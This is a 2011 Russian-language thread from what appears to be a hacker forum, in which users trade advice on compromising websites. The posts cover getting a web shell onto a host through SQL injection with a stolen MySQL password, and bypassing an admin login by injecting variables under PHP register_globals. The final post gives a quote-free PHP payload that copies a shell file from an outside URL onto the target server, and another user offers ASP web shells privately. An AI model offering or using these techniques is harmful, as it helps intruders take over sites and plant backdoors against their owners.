26.05.2011, 00:56
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
есть хост с провами root, достал пасс от mysql.user, но немогу найти ни phpmyadmin не сpanel, возможно ли гденить на самом хосте просмотреть как выйти на админку ихней бд, пытался также залить шелл через скуль, но кавычки экранируются...
|
|
|
26.05.2011, 01:05
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами:
8803961
Репутация:
8
|
|
Сообщение от winstrool
есть хост с провами root, достал пасс от mysql.user, но немогу найти ни phpmyadmin не сpanel, возможно ли гденить на самом хосте просмотреть как выйти на админку ихней бд, пытался также залить шелл через скуль, но кавычки экранируются...
Попытайся залить шелл через двойной запрос.
/showpost.php?p=663815&%3Bpostcount=39
|
|
|
|
26.05.2011, 01:25
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами:
8803961
Репутация:
8
|
|
Сообщение от Moriarty
А что нибудь похожее на wso есть на asp?
Кое-что есть, стучи в аську
|
|
|
|
26.05.2011, 01:32
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от FlaktW
Попытайся залить шелл через двойной запрос.
/showpost.php?p=663815&%3Bpostcount=39
спасибо, интиресная пища для размшления
все вайл заливается, но вот только теги режутся, проходит только текст((
|
|
|
|
26.05.2011, 02:44
|
|
Новичок
Регистрация: 07.05.2009
Сообщений: 20
С нами:
8953976
Репутация:
16
|
|
Возможен ли обход авторизации? (RG=On)
[CODE]
|
|
|
|
26.05.2011, 02:57
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Ну этож получается, сплоит должен быть такой:
Вся соль в том, что переменные $login и $password заранее не объявлены, и при условии что RG=ON, то мы их можем определить используя _GET|POST|COOKIE|SESSION методы. А если мы отправим в $_POST['admin_login'] и $ _POST['admin_passwd'] значения идентичные переменным $login и $password (которые мы подменили), то проверка
Код:
if($admin_login == $login && $admin_passwd == $password)
вернет положительный результат, и нас пустит в админку. |
|
|
|
26.05.2011, 04:36
|
|
Новичок
Регистрация: 07.05.2009
Сообщений: 20
С нами:
8953976
Репутация:
16
|
|
Сообщение от None
Вся соль в том, что переменные $login и $password заранее не объявлены...
Как такое возможно, если учитывать, что на момент сравнения:
Сообщение от None
$admin_login == $login && $admin_passwd == $password
Переменным $login и $password уже должны быть назначены значения? А при присвоении переменной значения - она считается объявленой?
|
|
|
|
26.05.2011, 04:44
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Если брать в расчет тот код, что ты предоставил, то там переменным не присвоены значения, и уязвимость имеет место быть.
А в случае если код имеет примерно такой вид:
[PHP]
[COLOR="#000000"][COLOR="#007700"]
|
|
|
|
26.05.2011, 04:54
|
|
Новичок
Регистрация: 07.05.2009
Сообщений: 20
С нами:
8953976
Репутация:
16
|
|
2Expl0ited
Да, все верно. Я не правильно написал изначально =[. Сорри.
|
|
|
|
27.05.2011, 23:05
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
С нами:
8718197
Репутация:
11
|
|
есть возможность выполнить пхп код, но в коде не должно быть ' ` " , есть ли возможность залить шелл?
Сообщение от Konqi
copy($_GET[a],$
_
GET
);&a=http://site.com/shell.php&b=shell.php
спасибо |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
